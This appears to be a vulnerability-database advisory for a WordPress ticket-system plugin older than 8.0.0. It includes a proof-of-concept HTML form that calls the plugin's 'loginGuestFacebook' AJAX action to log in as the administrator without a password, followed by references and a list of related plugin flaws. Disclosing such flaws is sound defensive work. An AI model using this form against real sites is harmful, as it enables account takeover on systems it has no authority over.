WP Support Plus Responsive Ticket System < 8.0.0 – Privilege Escalation | Plugin Vulnerabilities

Description

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

Proof of Concept

<form method="post" action="http://example.com/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Affects Plugins

wp-support-plus-responsive-ticket-system

Fixed in 8.0.0

References

URL

https://packetstormsecurity.com/files/#140413/

URL

https://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Verified

No

WPVDB ID

b1808005-0809-4ac7-92c7-1f65e410ac4f

Timeline

Publicly Published

2017-08-01 (about 6 years ago)

Added

2020-03-08 (about 4 years ago)

Last Updated

2020-03-09 (about 4 years ago)

Other

Published

Title

Published

2022-12-27

Title

Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin

Published

2023-12-26

Title

ARMember < 4.0.11 - Subscriber+ Privilege Escalation

Published

2020-01-20

Title

2J SlideShow < 1.3.40 - Authenticated Arbitrary Plugin Deactivation

Published

2020-01-24

Title

wpCentral < 1.4.8 - Privilege Escalation

Published

2023-11-14

Title

Thrive Theme Builder < 3.24.0 - Subscriber+ Privilege Escalation